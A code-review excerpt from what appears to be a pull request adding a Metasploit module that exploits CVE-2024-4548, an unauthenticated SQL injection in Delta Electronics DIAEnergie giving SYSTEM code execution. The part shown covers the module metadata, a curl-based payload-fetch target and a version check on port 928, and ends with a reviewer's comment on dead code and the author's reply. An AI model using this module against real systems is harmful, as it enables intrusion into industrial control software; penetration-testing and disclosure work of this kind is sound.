modules/exploits/windows/scada/diaenergie_sqli.rb

```diff
@@ -0,0 +1,134 @@
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+  include Msf::Exploit::Remote::Tcp
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'DIAEnergie SQL Injection (CVE-2024-4548)',
+        'Description' => %q{
+          SQL injection vulnerability in DIAEnergie <= v1.10 from Delta Electronics.
+          This vulnerability can be exploited by an unauthenticated remote attacker to gain arbitrary code execution through a SQL injection vulnerability in the CEBC service. The commands will get executed in the context of NT AUTHORITY\SYSTEM.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'Tenable', # Discovery & PoC
+          'Michael Heinzl', # MSF exploit
+        ],
+        'References' => [
+          [ 'URL', 'https://www.tenable.com/security/research/tra-2024-13'],
+          [ 'CVE', '2024-4548']
+        ],
+        'DisclosureDate' => '2024-05-06',
+        'Platform' => 'win',
+        'Arch' => [ ARCH_CMD ],
+        'Targets' => [
+          [
+            'Windows_Fetch',
+            {
+              'Arch' => [ ARCH_CMD ],
+              'Platform' => 'win',
+              'DefaultOptions' => { 'FETCH_COMMAND' => 'CURL' },
+              'Type' => :win_fetch
+            }
+          ]
+        ],
+        'DefaultTarget' => 0,
+
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS]
+        }
+      )
+    )
+
+    register_options(
+      [
+        Opt::RPORT(928)
+      ]
+    )
+  end
+
+  # Determine if the DIAEnergie version is vulnerable
+  def check
+    begin
+      connect
+      sock.put 'Who is it?'
+      res = sock.get || ''
+    rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e
+      vprint_error(e.message)
+      return Exploit::CheckCode::Unknown
+    ensure
+      disconnect
+    end
+
+    vprint_status('Who is it response: ' + res.to_s)
+    version_pattern = /\b\d+\.\d+\.\d+\.\d+\b/
+    version = res.match(version_pattern)
+
+    if version
+      version[0]
+    else
+      return Exploit::CheckCode::Detected
+    end
```

Comment:
It looks like this code might be doing nothing - just wanted to confirm if it's correct


```
    if version
      version[0]
    else
```

Reply:
Not sure what I was thinking, but I've updated it.